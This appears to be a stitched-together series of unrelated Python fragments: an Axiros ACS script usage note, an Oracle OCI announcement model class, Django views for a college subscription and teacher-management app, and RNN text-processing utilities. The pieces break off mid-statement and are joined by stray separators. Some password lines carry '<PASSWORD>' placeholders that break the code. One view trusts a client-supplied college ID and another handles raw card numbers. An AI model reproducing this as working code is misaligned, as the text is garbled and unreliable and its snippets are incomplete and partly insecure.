python3 ./axiros_acs.py ip:port user passwod serialno SVP "[{'Device.WiFi.AccessPoint.1.AC.1.Alias':'mok_1'}, {'Device.WiFi.AccessPoint.2.AC.1.Alias':'mik_2'}]"
# this must fail
python3 ./axiros_acs.py ip:port user passwd serialno SVP "[{'Device.WiFi.AccessPoint.1.AC.1.Alias':'mok_1'}, {'Device.WiFi.AccessPoint.2.AC.1.Alias':2}]"
"""
if len(sys.argv) | |
# coding: utf-8
# Copyright (c) 2016, 2022, Oracle and/or its affiliates. All rights reserved.
# This software is dual-licensed to you under the Universal Permissive License (UPL) 1.0 as shown at https://oss.oracle.com/licenses/upl or Apache License 2.0 as shown at http://www.apache.org/licenses/LICENSE-2.0. You may choose either license.
from oci.util import formatted_flat_dict, NONE_SENTINEL, value_allowed_none_or_none_sentinel # noqa: F401
from oci.decorators import init_model_state_from_kwargs
@init_model_state_from_kwargs
class BaseAnnouncement(object):
"""
Incident information that forms the basis of an announcement. Avoid entering confidential information.
"""
#: A constant which can be used with the time_one_type property of a BaseAnnouncement.
#: This constant has a value of "ACTION_REQUIRED_BY"
TIME_ONE_TYPE_ACTION_REQUIRED_BY = "ACTION_REQUIRED_BY"
#: A constant which can be used with the time_one_type property of a BaseAnnouncement.
#: This constant has a value of "NEW_START_TIME"
TIME_ONE_TYPE_NEW_START_TIME = "NEW_START_TIME"
#: A constant which can be used with the time_one_type property of a BaseAnnouncement.
#: This constant has a value of "ORIGINAL_END_TIME"
TIME_ONE_TYPE_ORIGINAL_END_TIME = "ORIGINAL_END_TIME"
#: A constant which can be used with the time_one_type property of a BaseAnnouncement.
#: This constant has a value of "REPORT_DATE"
TIME_ONE_TYPE_REPORT_DATE = "REPORT_DATE"
#: A constant which can be used with the time_one_type property of a BaseAnnouncement.
#: This constant has a value of "START_TIME"
TIME_ONE_TYPE_START_TIME = "START_TIME"
#: A constant which can be used with the time_one_type property of a BaseAnnouncement.
#: This constant has a value of "TIME_DETECTED"
TIME_ONE_TYPE_TIME_DETECTED = "TIME_DETECTED"
#: A constant which can be used with the time_two_type property of a BaseAnnouncement.
#: This constant has a value of "END_TIME"
TIME_TWO_TYPE_END_TIME = "END_TIME"
#: A constant which can be used with the time_two_type property of a BaseAnnouncement.
#: This constant has a value of "NEW_END_TIME"
TIME_TWO_TYPE_NEW_END_TIME = "NEW_END_TIME"
#: A constant which can be used with the announcement_type property of a BaseAnnouncement.
#: This constant has a value of "ACTION_RECOMMENDED"
ANNOUNCEMENT_TYPE_ACTION_RECOMMENDED = "ACTION_RECOMMENDED"
#: A constant which can be used with the announcement_type property of a BaseAnnouncement.
#: This constant has a value of "ACTION_REQUIRED"
ANNOUNCEMENT_TYPE_ACTION_REQUIRED = "ACTION_REQUIRED"
#: A constant which can be used with the announcement_type property of a BaseAnnouncement.
#: This constant has a value of "EMERGENCY_CHANGE"
ANNOUNCEMENT_TYPE_EMERGENCY_CHANGE = "EMERGENCY_CHANGE"
#: A constant which can be used with the announcement_type property of a BaseAnnouncement.
#: This constant has a value of "EMERGENCY_MAINTENANCE"
ANNOUNCEMENT_TYPE_EMERGENCY_MAINTENANCE = "EMERGENCY_MAINTENANCE"
#: A constant which can be used with the announcement_type property of a BaseAnnouncement.
#: This constant has a value of "EMERGENCY_MAINTENANCE_COMPLETE"
ANNOUNCEMENT_TYPE_EMERGENCY_MAINTENANCE_COMPLETE = "EMERGENCY_MAINTENANCE_COMPLETE"
#: A constant which can be used with the announcement_type property of a BaseAnnouncement.
#: This constant has a value of "EMERGENCY_MAINTENANCE_EXTENDED"
ANNOUNCEMENT_TYPE_EMERGENCY_MAINTENANCE_EXTENDED = "EMERGENCY_MAINTENANCE_EXTENDED"
#: A constant which can be used with the announcement_type property of a BaseAnnouncement.
#: This constant has a value of "EMERGENCY_MAINTENANCE_RESCHEDULED"
ANNOUNCEMENT_TYPE_EMERGENCY_MAINTENANCE_RESCHEDULED = "EMERGENCY_MAINTENANCE_RESCHEDULED"
#: A constant which can be used with the announcement_type property of a BaseAnnouncement.
#: This constant has a value of "INFORMATION"
ANNOUNCEMENT_TYPE_INFORMATION = "INFORMATION"
#: A constant which can be used with the announcement_type property of a BaseAnnouncement.
#: This constant has a value of "PLANNED_CHANGE"
ANNOUNCEMENT_TYPE_PLANNED_CHANGE = "PLANNED_CHANGE"
#: A constant which can be used with the announcement_type property of a BaseAnnouncement.
#: This constant has a value of "PLANNED_CHANGE_COMPLETE"
ANNOUNCEMENT_TYPE_PLANNED_CHANGE_COMPLETE = "PLANNED_CHANGE_COMPLETE"
#: A constant which can be used with the announcement_type property of a BaseAnnouncement.
#: This constant has a value of "PLANNED_CHANGE_EXTENDED"
ANNOUNCEMENT_TYPE_PLANNED_CHANGE_EXTENDED = "PLANNED_CHANGE_EXTENDED"
#: A constant which can be used with the announcement_type property of a BaseAnnouncement.
#: This constant has a value of "PLANNED_CHANGE_RESCHEDULED"
ANNOUNCEMENT_TYPE_PLANNED_CHANGE_RESCHEDULED = "PLANNED_CHANGE_RESCHEDULED"
#: A constant which can be used with the announcement_type property of a BaseAnnouncement.
#: This constant has a value of "PRODUCTION_EVENT_NOTIFICATION"
ANNOUNCEMENT_TYPE_PRODUCTION_EVENT_NOTIFICATION = "PRODUCTION_EVENT_NOTIFICATION"
#: A constant which can be used with the announcement_type property of a BaseAnnouncement.
#: This constant has a value of "SCHEDULED_MAINTENANCE"
ANNOUNCEMENT_TYPE_SCHEDULED_MAINTENANCE = "SCHEDULED_MAINTENANCE"
#: A constant which can be used with the lifecycle_state property of a BaseAnnouncement.
#: This constant has a value of "ACTIVE"
LIFECYCLE_STATE_ACTIVE = "ACTIVE"
#: A constant which can be used with the lifecycle_state property of a BaseAnnouncement.
#: This constant has a value of "INACTIVE"
LIFECYCLE_STATE_INACTIVE = "INACTIVE"
#: A constant which can be used with the platform_type property of a BaseAnnouncement.
#: This constant has a value of "IAAS"
PLATFORM_TYPE_IAAS = "IAAS"
#: A constant which can be used with the platform_type property of a BaseAnnouncement.
#: This constant has a value of "SAAS"
PLATFORM_TYPE_SAAS = "SAAS"
def __init__(self, **kwargs):
"""
Initializes a new BaseAnnouncement object with values from keyword arguments. This class has the following subclasses and if you are using this class as input
to a service operations then you should favor using a subclass over the base class:
* :class:`~oci.announcements_service.models.AnnouncementSummary`
* :class:`~oci.announcements_service.models.Announcement`
The following keyword arguments are supported (corresponding to the getters/setters of this class):
:param id:
The value to assign to the id property of this BaseAnnouncement.
:type id: str
:param type:
The value to assign to the type property of this BaseAnnouncement.
:type type: str
:param reference_ticket_number:
The value to assign to the reference_ticket_number property of this BaseAnnouncement.
:type reference_ticket_number: str
:param summary:
The value to assign to the summary property of this BaseAnnouncement.
:type summary: str
:param time_one_title:
The value to assign to the time_one_title property of this BaseAnnouncement.
:type time_one_title: str
:param time_one_type:
The value to assign to the time_one_type property of this BaseAnnouncement.
Allowed values for this property are: "ACTION_REQUIRED_BY", "NEW_START_TIME", "ORIGINAL_END_TIME", "REPORT_DATE", "START_TIME", "TIME_DETECTED"
:type time_one_type: str
:param time_one_value:
The value to assign to the time_one_value property of this BaseAnnouncement.
:type time_one_value: datetime
:param time_two_title:
The value to assign to the time_two_title property of this BaseAnnouncement.
:type time_two_title: str
:param time_two_type:
The value to assign to the time_two_type property of this BaseAnnouncement.
Allowed values for this property are: "END_TIME", "NEW_END_TIME"
:type time_two_type: str
:param time_two_value:
The value to assign to the time_two_value property of this BaseAnnouncement.
:type time_two_value: datetime
:param services:
The value to assign to the services property of this BaseAnnouncement.
:type services: list[str]
:param affected_regions:
The value to assign to the affected_regions property of this BaseAnnouncement.
:type affected_regions: list[str]
:param announcement_type:
The value to assign to the announcement_type property of this BaseAnnouncement.
Allowed values for this property are: "ACTION_RECOMMENDED", "ACTION_REQUIRED", "EMERGENCY_CHANGE", "EMERGENCY_MAINTENANCE", "EMERGENCY_MAINTENANCE_COMPLETE", "EMERGENCY_MAINTENANCE_EXTENDED", "EMERGENCY_MAINTENANCE_RESCHEDULED", "INFORMATION", "PLANNED_CHANGE", "PLANNED_CHANGE_COMPLETE", "PLANNED_CHANGE_EXTENDED", "PLANNED_CHANGE_RESCHEDULED", "PRODUCTION_EVENT_NOTIFICATION", "SCHEDULED_MAINTENANCE"
:type announcement_type: str
:param lifecycle_state:
The value to assign to the lifecycle_state property of this BaseAnnouncement.
Allowed values for this property are: "ACTIVE", "INACTIVE"
:type lifecycle_state: str
:param is_banner:
The value to assign to the is_banner property of this BaseAnnouncement.
:type is_banner: bool
:param time_created:
The value to assign to the time_created property of this BaseAnnouncement.
:type time_created: datetime
:param time_updated:
The value to assign to the time_updated property of this BaseAnnouncement.
:type time_updated: datetime
:param environment_name:
The value to assign to the environment_name property of this BaseAnnouncement.
:type environment_name: str
:param platform_type:
The value to assign to the platform_type property of this BaseAnnouncement.
Allowed values for this property are: "IAAS", "SAAS"
:type platform_type: str
"""
self.swagger_types = {
'id': 'str',
'type': 'str',
'reference_ticket_number': 'str',
'summary': 'str',
'time_one_title': 'str',
'time_one_type': 'str',
'time_one_value': 'datetime',
'time_two_title': 'str',
'time_two_type': 'str',
'time_two_value': 'datetime',
'services': 'list[str]',
'affected_regions': 'list[str]',
'announcement_type': 'str',
'lifecycle_state': 'str',
'is_banner': 'bool',
'time_created': 'datetime',
'time_updated': 'datetime',
'environment_name': 'str',
'platform_type': 'str'
}
self.attribute_map = {
'id': 'id',
'type': 'type',
'reference_ticket_number': 'referenceTicketNumber',
'summary': 'summary',
'time_one_title': 'timeOneTitle',
'time_one_type': 'timeOneType',
'time_one_value': 'timeOneValue',
'time_two_title': 'timeTwoTitle',
'time_two_type': 'timeTwoType',
'time_two_value': 'timeTwoValue',
'services': 'services',
'affected_regions': 'affectedRegions',
'announcement_type': 'announcementType',
'lifecycle_state': 'lifecycleState',
'is_banner': 'isBanner',
'time_created': 'timeCreated',
'time_updated': 'timeUpdated',
'environment_name': 'environmentName',
'platform_type': 'platformType'
}
self._id = None
self._type = None
self._reference_ticket_number = None
self._summary = None
self._time_one_title = None
self._time_one_type = None
self._time_one_value = None
self._time_two_title = None
self._time_two_type = None
self._time_two_value = None
self._services = None
self._affected_regions = None
self._announcement_type = None
self._lifecycle_state = None
self._is_banner = None
self._time_created = None
self._time_updated = None
self._environment_name = | |
import json
from django.contrib import messages
from django.contrib.auth.decorators import login_required
from django.contrib.auth.models import Group
from django.db import IntegrityError
from django.http import JsonResponse, HttpResponse
from django.shortcuts import render, redirect
from ..decorators import allowed_users
from ..models import *
from .auth_views import *
from .sybadmin_views import *
from .teacher_views import *
from .student_views import *
from .teach_stud_commonviews import *
@login_required
@allowed_users(allowed_roles=['collegeadmin'])
def college_page(request):
teachers = Teacher.objects.filter(college=request.user.college)
departments = Department.objects.filter(college=request.user.college)
classes = CollegeClass.objects.filter(college=request.user.college)
students = Student.objects.filter(college=request.user.college)
class_assignments = [assignment for assignment in ClassWorkPost.objects.filter(is_assignment=True) if assignment.college_class in classes]
total_number_of_assignments = len(class_assignments)
submitted_assignments = [solution for solution in AssignmentSolution.objects.all() if solution.student in students]
number_of_submitted_assignments = len(submitted_assignments)
context_dict = {
'teachers': teachers,
'departments': departments,
'classes': classes,
'students': students,
'total_number_of_assignments': total_number_of_assignments,
'number_of_submitted_assignments': number_of_submitted_assignments,
'number_of_students': len(students),
'number_of_teachers': len(teachers),
}
return render(request, template_name='college/admin/college_admin.html', context=context_dict)
@login_required
def renew_plan(request):
# We cannot use allowed_users decorator for this view because
# using that decorator will force the user to plan_cancelled
# view and refrain him/her from renewing the subscription plan.
if request.user.groups.all()[0].name == 'collegeadmin':
if request.method == 'POST':
plan_selected = request.POST.get('plan_selected')
cardnumber = request.POST.get('cardnumber')
cardnumber = cardnumber.replace(' ', '')
cardcvv = request.POST.get('cardcvv')
plan = None
try:
plan = Plan.objects.get(pk=plan_selected)
except Exception as err:
messages.error(request, f'{err}')
return redirect(renew_plan)
college = request.user.college
college.renew(plan=plan, card_info=cardnumber)
college.save()
# NOTE: Here you can add backend payment processing
# process payments here and generate invoice
invoice = Invoice.objects.create(
college=request.user.college,
plan_subscribed=plan,
)
invoice.pay()
invoice.save()
return redirect(college_admin_account)
if request.user.college.days_left() > 15 and request.user.college.subscription_active:
return redirect(college_admin_account)
plans = Plan.objects.all()
context_dict = {
'plans': plans,
}
return render(request, template_name='college/admin/renew_plan.html', context=context_dict)
else:
return HttpResponse('You are not authorized to view this page')
@login_required
@allowed_users(allowed_roles=['collegeadmin'])
def cancel_plan(request):
if request.method == 'POST':
data = json.loads(request.body)
college_id = data['college_id']
college = College.objects.get(pk=college_id)
if college.subscription_end_date < datetime.now().date():
return JsonResponse({
'process': 'failed',
'msg': 'Your plan is not active. Please renew your plan in order to continue using our product.',
})
college.cancel_plan()
college.save()
return JsonResponse({
'process': 'success',
'msg': 'Your plan/subscription has been deactivated. '
'Please renew your plan in order to continue using our product.',
})
return JsonResponse({
'process': 'failed',
'msg': 'GET method is not supported by this endpoint',
})
@login_required
def plan_cancelled(request):
# We cannot use allowed_users decorator for this view because
# using that will generate a redirection infinite loop and we
# will get the error of 'too many redirects'.
if request.user.groups.all()[0].name == 'collegeadmin':
if not request.user.college.subscription_active or request.user.college.days_left() < 1:
return render(request, template_name='college/admin/plan_cancelled.html')
else:
return redirect(college_admin_account)
elif request.user.groups.all()[0].name == 'teacher':
if not request.user.teacher.college.subscription_active or request.user.teacher.college.days_left() < 1:
return render(request, template_name='college/admin/plan_cancelled.html')
else:
return redirect(college_teacher_student_account)
elif request.user.groups.all()[0].name == 'student':
if not request.user.student.college.subscription_active or request.user.student.college.days_left() < 1:
return render(request, template_name='college/admin/plan_cancelled.html')
else:
return redirect(college_teacher_student_account)
else:
return HttpResponse('You are not authorized to view this page')
@login_required
@allowed_users(allowed_roles=['collegeadmin'])
def college_add_teachers(request, pk=None):
classes_list = [classname['name'] for classname in
CollegeClass.objects.filter(college=request.user.college).values('name')]
if request.method == 'POST':
# for AJAX request
data = json.loads(request.body)
mode = data['mode']
first_name = data['first_name']
last_name = data['last_name']
classes_assigned = data['classes_assigned']
email_id = data['email_id']
password1 = <PASSWORD> if data['password1'] == '' else data['password1']
if mode == 'add':
# request is for adding new teacher
try:
# register the User
new_user = User.objects.create_user(
first_name=first_name,
last_name=last_name,
email=email_id,
username=email_id,
)
new_user.set_password(<PASSWORD>)
new_user.save()
# Add this user to teacher group
collegeadmin_group = Group.objects.get(name='teacher')
collegeadmin_group.user_set.add(new_user)
# Get the college of the current logged in user (collegeadmin user)
college = request.user.college
# create a teacher
clg_teacher = Teacher.objects.create(
user=new_user,
college=college,
first_name=first_name,
last_name=last_name,
email=email_id,
)
# add the assigned classes to this teacher
for cls in classes_assigned:
clg_cls = CollegeClass.objects.get(name=cls, college=request.user.college)
clg_teacher.college_classes.add(clg_cls)
return JsonResponse({
'process': 'success',
'msg': f'Success! Teacher {first_name} {last_name} has been added to the database.',
})
except IntegrityError:
return JsonResponse({
'process': 'failed',
'msg': f'Teacher {first_name} {last_name} has already been added to the database.'
})
except Exception as err:
return JsonResponse({'process': 'failed', 'msg': f'{err}'})
else:
# this is an AJAX request for updating existing teacher
# This request also will contain password2 field data as password validation is
# not done on client side for this request's form
password2 = None if data['password2'] == '' else data['password2']
try:
# Get the teacher by pk (id) and update the data
clg_teacher_id = data['teacher_id']
clg_teacher = Teacher.objects.get(pk=clg_teacher_id, college=request.user.college)
clg_teacher.first_name = first_name
clg_teacher.last_name = last_name
clg_teacher.email = email_id
# Now update the User associated (OneToOne) with the Teacher
clg_teacher.user.email = email_id
clg_teacher.user.username = email_id
clg_teacher.user.first_name = first_name
clg_teacher.user.last_name = last_name
# Update the classes assigned to the teacher
# First clear existing classes data
clg_teacher.college_classes.clear()
# Now add newly selected/edited data
for cls in classes_assigned:
clg_cls = CollegeClass.objects.get(name=cls, college=request.user.college)
clg_teacher.college_classes.add(clg_cls)
# if the password provided is valid then update it too
if password1 is not None and password2 is not None:
if password1 == password2:
clg_teacher.user.set_password(<PASSWORD>)
else:
return JsonResponse({
'process': 'failed',
'msg': f'Error! passwords do not match',
})
# Now save the data
clg_teacher.user.save()
clg_teacher.save()
# updated_teacher_data is for updating the html table in the frontend once
# request gets processed
updated_teacher_data = {
'id': clg_teacher.id,
'first_name': clg_teacher.first_name,
'last_name': clg_teacher.last_name,
'email_id': clg_teacher.email,
'class_list': [cls_name.name for cls_name in clg_teacher.college_classes.all()],
}
# Return success message
return JsonResponse({
'process': 'success',
'msg': f'{first_name} {last_name}\'s data has been successfully updated.',
'updated_data': updated_teacher_data,
})
except Exception as err:
return JsonResponse({
'process': 'failed',
'msg': f'Error! {err}',
})
if pk is not None:
# it means that this is an AJAX GET request for getting a teacher's data using pk (id)
try:
teacher = Teacher.objects.get(pk=pk, college=request.user.college)
teacher_json_obj = {
'first_name': teacher.first_name,
'last_name': teacher.last_name,
'classes_assigned': [teach.name for teach in teacher.college_classes.all()],
'email_id': teacher.email,
}
return JsonResponse({
'process': 'success',
'msg': 'Success',
'teacher_json_obj': teacher_json_obj,
})
except Exception as err:
return JsonResponse({
'process': 'failed',
'msg': f'Error! {err}',
})
context_dict = {'classes_list': classes_list}
return render(request, template_name='college/admin/admin_addteachers.html', context=context_dict)
@login_required
@allowed_users(allowed_roles=['collegeadmin'])
def college_del_teachers(request, pk=None):
"""
This view is for handling AJAX requests only for deleting teachers.
:param request:
:param pk:
:return: JsonResponse()
"""
if request.method == 'POST':
try:
teacher = Teacher.objects.get(pk=pk, college=request.user.college)
teacher.user.delete()
teacher.delete()
return JsonResponse({'process': 'success'})
except Exception as err:
return JsonResponse({'process': 'failed', 'msg': f'{err}'})
return JsonResponse({'process': 'failed', 'msg': 'Error! invalid operation'})
@login_required
@allowed_users(allowed_roles=['collegeadmin'])
def college_add_classes(request, pk=None):
departments_list = [department['name'] for department in
Department.objects.filter(college=request.user.college).values('name')]
if request.method == 'POST':
# for AJAX request
data = json.loads(request.body)
form_type = data['form_type']
if form_type == 'department':
if pk is None:
# this means that the request came from 'add new department' form
department_name = data['department_name']
college = request.user.college
try:
obj, created = Department.objects.get_or_create(
college=college,
name=department_name,
)
if not created:
return JsonResponse({
'process': 'failed',
'msg': f'{department_name} department already exists in the the database.',
})
return JsonResponse({
'process': 'success',
'msg': f'Success! {department_name} department added to the database.',
'departments_list': departments_list,
})
except IntegrityError:
return JsonResponse({'process': 'failed', 'msg': f'{department_name} already exists.'})
except Exception as err:
return JsonResponse({'process': 'failed', 'msg': f'{err}'})
else:
# this request came for updating an existing department's fields
department_name = data['department_name']
try:
dep = Department.objects.get(pk=pk, college=request.user.college)
dep.name = department_name
dep.save()
return JsonResponse({
'process': 'success',
'department_name': f'{dep.name}',
})
except IntegrityError:
return JsonResponse({
'process': 'failed',
'msg': 'Duplicate value error',
})
except Exception as err:
return JsonResponse({
'process': 'failed',
'msg': f'{err}',
})
elif form_type == 'class':
if pk is None:
# this means that the request came from 'add new classes' form
class_name = data['class_name']
department = Department.objects.get(name=data['department_name'], college=request.user.college)
college = request.user.college
try:
obj, created = CollegeClass.objects.get_or_create(
college=college,
name=class_name,
department=department,
)
if not created:
return JsonResponse({
'process': 'failed',
'msg': f'{class_name} class already exists under {department.name} department',
'departments_list': departments_list,
})
return JsonResponse({
'process': 'success',
'msg': f'Success! {class_name} class added under {department.name}',
'departments_list': departments_list,
})
except IntegrityError:
return JsonResponse({'process': 'failed',
'msg': f'{class_name} already exists under {department.name} department'})
except Exception as err:
return JsonResponse({'process': 'failed', 'msg': f'{err}'})
else:
# this request came for updating an existing class's fields
class_name = data['class_name']
department_name = data['department_name']
try:
cls = CollegeClass.objects.get(pk=pk)
cls.name = class_name
cls.department = Department.objects.get(name=department_name, college=request.user.college)
cls.save()
return JsonResponse({
'process': 'success',
'class_name': f'{cls.name}',
'department_name': f'{cls.department}',
})
except IntegrityError:
return JsonResponse({
'process': 'failed',
'msg': 'Duplicate value error',
})
except Exception as err:
return JsonResponse({
'process': 'failed',
'msg': f'{err}',
})
context_dict = {
'departments_list': departments_list,
}
return render(request, template_name='college/admin/admin_addclasses.html', context=context_dict)
@login_required
@allowed_users(allowed_roles=['collegeadmin'])
def college_del_classes(request, pk=None):
"""
This view is for handling AJAX requests only for deleting classes.
:param request:
:param pk:
:return: JsonResponse()
"""
if request.method | |
time machine book into a list of sentences."""
with open('../data/timemachine.txt', 'r') as f:
lines = f.readlines()
return [re.sub('[^A-Za-z]+', ' ', line.strip().lower())
for line in lines]
# Defined in file: ./chapter_recurrent-neural-networks/text-preprocessing.md
def tokenize(lines, token='word'):
"""Split sentences into word or char tokens"""
if token == 'word':
return [line.split(' ') for line in lines]
elif token == 'char':
return [list(line) for line in lines]
else:
print('ERROR: unkown token type '+token)
# Defined in file: ./chapter_recurrent-neural-networks/text-preprocessing.md
class Vocab(object):
def __init__(self, tokens, min_freq=0, use_special_tokens=False):
# Sort according to frequencies
counter = count_corpus(tokens)
self.token_freqs = sorted(counter.items(), key=lambda x: x[0])
self.token_freqs.sort(key=lambda x: x[1], reverse=True)
if use_special_tokens:
# padding, begin of sentence, end of sentence, unknown
self.pad, self.bos, self.eos, self.unk = (0, 1, 2, 3)
uniq_tokens = ['<pad>', '<bos>', '<eos>', '<unk>']
else:
self.unk, uniq_tokens = 0, ['<unk>']
uniq_tokens += [token for token, freq in self.token_freqs
if freq >= min_freq and token not in uniq_tokens]
self.idx_to_token, self.token_to_idx = [], dict()
for token in uniq_tokens:
self.idx_to_token.append(token)
self.token_to_idx[token] = len(self.idx_to_token) - 1
def __len__(self):
return len(self.idx_to_token)
def __getitem__(self, tokens):
if not isinstance(tokens, (list, tuple)):
return self.token_to_idx.get(tokens, self.unk)
return [self.__getitem__(token) for token in tokens]
def to_tokens(self, indices):
if not isinstance(indices, (list, tuple)):
return self.idx_to_token[indices]
return [self.idx_to_token[index] for index in indices]
# Defined in file: ./chapter_recurrent-neural-networks/text-preprocessing.md
def count_corpus(sentences):
# Flatten a list of token lists into a list of tokens
tokens = [tk for line in sentences for tk in line]
return collections.Counter(tokens)
# Defined in file: ./chapter_recurrent-neural-networks/text-preprocessing.md
def load_corpus_time_machine(max_tokens=-1):
lines = read_time_machine()
tokens = tokenize(lines, 'char')
vocab = Vocab(tokens)
corpus = [vocab[tk] for line in tokens for tk in line]
if max_tokens > 0: corpus = corpus[:max_tokens]
return corpus, vocab
# Defined in file: ./chapter_recurrent-neural-networks/lang-model.md
def seq_data_iter_random(corpus, batch_size, num_steps):
# Offset the iterator over the data for uniform starts
corpus = corpus[random.randint(0, num_steps):]
# Subtract 1 extra since we need to account for label
num_examples = ((len(corpus) - 1) // num_steps)
example_indices = list(range(0, num_examples * num_steps, num_steps))
random.shuffle(example_indices)
# This returns a sequence of the length num_steps starting from pos
data = lambda pos: corpus[pos: pos + num_steps]
# Discard half empty batches
num_batches = num_examples // batch_size
for i in range(0, batch_size * num_batches, batch_size):
# Batch_size indicates the random examples read each time
batch_indices = example_indices[i:(i+batch_size)]
X = [data(j) for j in batch_indices]
Y = [data(j + 1) for j in batch_indices]
yield nd.array(X), nd.array(Y)
# Defined in file: ./chapter_recurrent-neural-networks/lang-model.md
def seq_data_iter_consecutive(corpus, batch_size, num_steps):
# Offset for the iterator over the data for uniform starts
offset = random.randint(0, num_steps)
# Slice out data - ignore num_steps and just wrap around
num_indices = ((len(corpus) - offset - 1) // batch_size) * batch_size
Xs = nd.array(corpus[offset:offset+num_indices])
Ys = nd.array(corpus[offset+1:offset+1+num_indices])
Xs, Ys = Xs.reshape((batch_size, -1)), Ys.reshape((batch_size, -1))
num_batches = Xs.shape[1] // num_steps
for i in range(0, num_batches * num_steps, num_steps):
X = Xs[:,i:(i+num_steps)]
Y = Ys[:,i:(i+num_steps)]
yield X, Y
# Defined in file: ./chapter_recurrent-neural-networks/lang-model.md
class SeqDataLoader(object):
"""A iterator to load sequence data"""
def __init__(self, batch_size, num_steps, use_random_iter, max_tokens):
if use_random_iter:
data_iter_fn = d2l.seq_data_iter_random
else:
data_iter_fn = d2l.seq_data_iter_consecutive
self.corpus, self.vocab = d2l.load_corpus_time_machine(max_tokens)
self.get_iter = lambda: data_iter_fn(self.corpus, batch_size, num_steps)
def __iter__(self):
return self.get_iter()
# Defined in file: ./chapter_recurrent-neural-networks/lang-model.md
def load_data_time_machine(batch_size, num_steps, use_random_iter=False,
max_tokens=10000):
data_iter = SeqDataLoader(
batch_size, num_steps, use_random_iter, max_tokens)
return data_iter, data_iter.vocab
# Defined in file: ./chapter_recurrent-neural-networks/rnn-scratch.md
class RNNModelScratch(object):
"""A RNN Model based on scratch implementations"""
def __init__(self, vocab_size, num_hiddens, ctx,
get_params, init_state, forward):
self.vocab_size, self.num_hiddens = vocab_size, num_hiddens
self.params = get_params(vocab_size, num_hiddens, ctx)
self.init_state, self.forward_fn = init_state, forward
def __call__(self, X, state):
X = nd.one_hot(X.T, self.vocab_size)
return self.forward_fn(X, state, self.params)
def begin_state(self, batch_size, ctx):
return self.init_state(batch_size, self.num_hiddens, ctx)
# Defined in file: ./chapter_recurrent-neural-networks/rnn-scratch.md
def predict_ch8(prefix, num_predicts, model, vocab, ctx):
state = model.begin_state(batch_size=1, ctx=ctx)
outputs = [vocab[prefix[0]]]
get_input = lambda: nd.array([outputs[-1]], ctx=ctx).reshape((1, 1))
for y in prefix[1:]: # Warmup state with prefix
_, state = model(get_input(), state)
outputs.append(vocab[y])
for _ in range(num_predicts): # Predict num_predicts steps
Y, state = model(get_input(), state)
outputs.append(int(Y.argmax(axis=1).reshape(1).asscalar()))
return ''.join([vocab.idx_to_token[i] for i in outputs])
# Defined in file: ./chapter_recurrent-neural-networks/rnn-scratch.md
def grad_clipping(model, theta):
if isinstance(model, gluon.Block):
params = [p.data() for p in model.collect_params().values()]
else:
params = model.params
norm = math.sqrt(sum((p.grad ** 2).sum().asscalar() for p in params))
if norm > theta:
for param in params:
param.grad[:] *= theta / norm
# Defined in file: ./chapter_recurrent-neural-networks/rnn-scratch.md
def train_epoch_ch8(model, train_iter, loss, updater, ctx, use_random_iter):
state, timer = None, d2l.Timer()
metric = d2l.Accumulator(2) # loss_sum, num_examples
for X, Y in train_iter:
if state is None or use_random_iter:
# Initialize state when either it's the first iteration or
# using random sampling.
state = model.begin_state(batch_size=X.shape[0], ctx=ctx)
else:
for s in state: s.detach()
y = Y.T.reshape((-1,))
X, y = X.as_in_context(ctx), y.as_in_context(ctx)
with autograd.record():
py, state = model(X, state)
l = loss(py, y).mean()
l.backward()
grad_clipping(model, 1)
updater(batch_size=1) # Since used mean already.
metric.add(l.asscalar() * y.size, y.size)
return math.exp(metric[0]/metric[1]), metric[1]/timer.stop()
# Defined in file: ./chapter_recurrent-neural-networks/rnn-scratch.md
def train_ch8(model, train_iter, vocab, lr, num_epochs, ctx,
use_random_iter=False):
# Initialize
loss = gluon.loss.SoftmaxCrossEntropyLoss()
animator = d2l.Animator(xlabel='epoch', ylabel='perplexity',
legend=['train'], xlim=[1, num_epochs])
if isinstance(model, gluon.Block):
model.initialize(ctx=ctx, force_reinit=True, init=init.Normal(0.01))
trainer = gluon.Trainer(model.collect_params(), 'sgd', {'learning_rate': lr})
updater = lambda batch_size : trainer.step(batch_size)
else:
updater = lambda batch_size : d2l.sgd(model.params, lr, batch_size)
predict = lambda prefix: predict_ch8(prefix, 50, model, vocab, ctx)
# Train and check the progress.
for epoch in range(num_epochs):
ppl, speed = train_epoch_ch8(
model, train_iter, loss, updater, ctx, use_random_iter)
if epoch % 10 == 0:
print(predict('time traveller'))
animator.add(epoch+1, [ppl])
print('Perplexity %.1f, %d tokens/sec on %s' % (ppl, speed, ctx))
print(predict('time traveller'))
print(predict('traveller'))
# Defined in file: ./chapter_recurrent-neural-networks/rnn-gluon.md
class RNNModel(nn.Block):
def __init__(self, rnn_layer, vocab_size, **kwargs):
super(RNNModel, self).__init__(**kwargs)
self.rnn = rnn_layer
self.vocab_size = vocab_size
self.dense = nn.Dense(vocab_size)
def forward(self, inputs, state):
X = nd.one_hot(inputs.T, self.vocab_size)
Y, state = self.rnn(X, state)
# The fully connected layer will first change the shape of Y to
# (num_steps * batch_size, num_hiddens)
# Its output shape is (num_steps * batch_size, vocab_size)
output = self.dense(Y.reshape((-1, Y.shape[-1])))
return output, state
def begin_state(self, *args, **kwargs):
return self.rnn.begin_state(*args, **kwargs)
# Defined in file: ./chapter_recurrent-neural-networks/machine-translation.md
def read_data_nmt():
fname = gluon.utils.download('http://data.mxnet.io/data/fra-eng.zip')
with zipfile.ZipFile(fname, 'r') as f:
return f.read('fra.txt').decode("utf-8")
# Defined in file: ./chapter_recurrent-neural-networks/machine-translation.md
def preprocess_nmt(text):
text = text.replace('\u202f', ' ').replace('\xa0', ' ')
no_space = lambda char, prev_char: (
True if char in (',', '!', '.') and prev_char != ' ' else False)
out = [' '+char if i > 0 and no_space(char, text[i-1]) else char
for i, char in enumerate(text.lower())]
return ''.join(out)
# Defined in file: ./chapter_recurrent-neural-networks/machine-translation.md
def tokenize_nmt(text, num_examples = None):
source, target = [], []
for i, line in enumerate(text.split('\n')):
if num_examples and i > num_examples: break
parts = line.split('\t')
if len(parts) == 2:
source.append(parts[0].split(' '))
target.append(parts[1].split(' '))
return source, target
# Defined in file: ./chapter_recurrent-neural-networks/machine-translation.md
def trim_pad(line, num_steps, padding_token):
if len(line) > num_steps: return line[:num_steps] # Trim
return line + [padding_token] * (num_steps - len(line)) # Pad
# Defined in file: ./chapter_recurrent-neural-networks/machine-translation.md
def build_array(lines, vocab, num_steps, is_source):
lines = [vocab[l] for l in lines]
if not is_source:
lines = [[vocab.bos] + l + [vocab.eos] for l in lines]
array = nd.array([trim_pad(l, num_steps, vocab.pad) for l in lines])
